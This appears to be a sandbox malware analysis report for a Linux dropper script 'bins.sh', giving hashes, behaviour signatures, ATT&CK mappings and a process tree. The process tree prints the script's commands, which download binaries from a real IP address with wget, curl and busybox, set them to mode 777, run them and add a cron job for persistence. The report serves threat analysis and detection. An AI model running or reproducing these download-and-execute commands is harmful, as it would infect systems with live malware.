8bdb9a1f78d4395a40db41c5757ca2eda75a4d5a96966ce5e506fd2191f25ffd

Analysis

max time kernel
149s
max time network
150s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
23-11-2024 19:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

6949807f763e2d0774e325b916dd0898
SHA1

eebdc0a1509618093370f26bae1f6b65feda6571
SHA256

8bdb9a1f78d4395a40db41c5757ca2eda75a4d5a96966ce5e506fd2191f25ffd
SHA512

e9c89ca7f13edb512eb6b29ed5f089a56fe2baabf8bc906e2ac51209f202a82a8e3fa6a453c57eeb0439b49a836ed07c85a7d1e2fac0b26e3b8da29459e92ab2
SSDEEP

192:mLvr08gJp7I427s0M7gQ1COtJpYa6Gq74oTIPbM4Uc6PXPDPev3JS7ckrPbMuUck:y0gFDzV/Dev3Mc3/Dev36X

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2114) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmod

pid	Process
670	chmod
679	chmod
691	chmod
709	chmod

Executes dropped EXE 4 IoCs

Processes:

hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATNh8thNalBVsVsZGzxShbyd3BrADft88FHF5qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

ioc	pid	Process
/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	671	hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	680	h8thNalBVsVsZGzxShbyd3BrADft88FHF5
/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	693	qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	711	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Renames itself 1 IoCs

Processes:

2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

pid	Process
712	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.nB7acw	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curl2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1crontab

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/766/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/936/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/964/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/983/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/747/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/879/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/972/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/944/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/8/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/269/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/743/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/782/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/808/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/896/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/977/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1027/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/974/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/19/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/779/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/827/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/922/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/925/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/938/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/941/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/985/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/960/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/994/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1002/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1006/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/741/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/744/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/799/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/801/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/809/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/847/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/41/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/856/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/902/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/933/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/952/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/18/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/26/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/736/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/877/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/729/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/948/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1015/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/588/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/807/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/858/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/926/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/4/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/11/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/141/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/738/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/755/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/770/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/943/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/990/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1016/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/631/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlwgetbusyboxwgetbusyboxwgetcurlwgetbusyboxbusybox

description	ioc	Process
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	curl
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	curl
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	curl
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	wget
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	busybox
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	wget
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	busybox
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	wget
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	curl
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	wget
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	busybox
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:638
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:640
- /usr/bin/wget
  wget http://87.120.125.191/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Writes file to tmp directory
  PID:642
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:656
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Writes file to tmp directory
  PID:666
- /bin/chmod
  chmod 777 hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - File and Directory Permissions Modification
  PID:670
- /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  ./hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Executes dropped EXE
  PID:671
- /bin/rm
  rm hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  PID:674
- /usr/bin/wget
  wget http://87.120.125.191/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Writes file to tmp directory
  PID:675
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:677
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Writes file to tmp directory
  PID:678
- /bin/chmod
  chmod 777 h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - File and Directory Permissions Modification
  PID:679
- /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  ./h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Executes dropped EXE
  PID:680
- /bin/rm
  rm h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  PID:682
- /usr/bin/wget
  wget http://87.120.125.191/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Writes file to tmp directory
  PID:683
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:684
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Writes file to tmp directory
  PID:688
- /bin/chmod
  chmod 777 qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  ./qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Executes dropped EXE
  PID:693
- /bin/rm
  rm qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  PID:695
- /usr/bin/wget
  wget http://87.120.125.191/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Writes file to tmp directory
  PID:696
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:701
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Writes file to tmp directory
  PID:706
- /bin/chmod
  chmod 777 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - File and Directory Permissions Modification
  PID:709
- /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  ./2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:711
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:713
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:715
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:716
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:717
- /bin/rm
  rm 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  PID:730
- /usr/bin/wget
  wget http://87.120.125.191/bins/tVUZen854UwlSjqMByJgMVogO5RprLxy9j
  2⤵
  PID:735

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN

Filesize
111KB

MD5
ca897a38f23ec23521ce0b1b83f8422d

SHA1
b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

SHA256
043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

SHA512
10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

Download Submit
/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/var/spool/cron/crontabs/tmp.nB7acw

Filesize
210B

MD5
8092a1fb461084edbc5ac930f440e9d1

SHA1
a9bab0805879cec3a6da6b0a42b206a5d5f15df5

SHA256
af8e4be4d4783887799cd9076e162943abe1338ca02df62169e60b0ba926279b

SHA512
5e90ae7291e011c50c9930dad52197083deb824dbd0ae85d4de5d4322ed59891d068e6edcfceb10f79919302420dd4042506060b479af8f3d48b36720d292b6d

Download Submit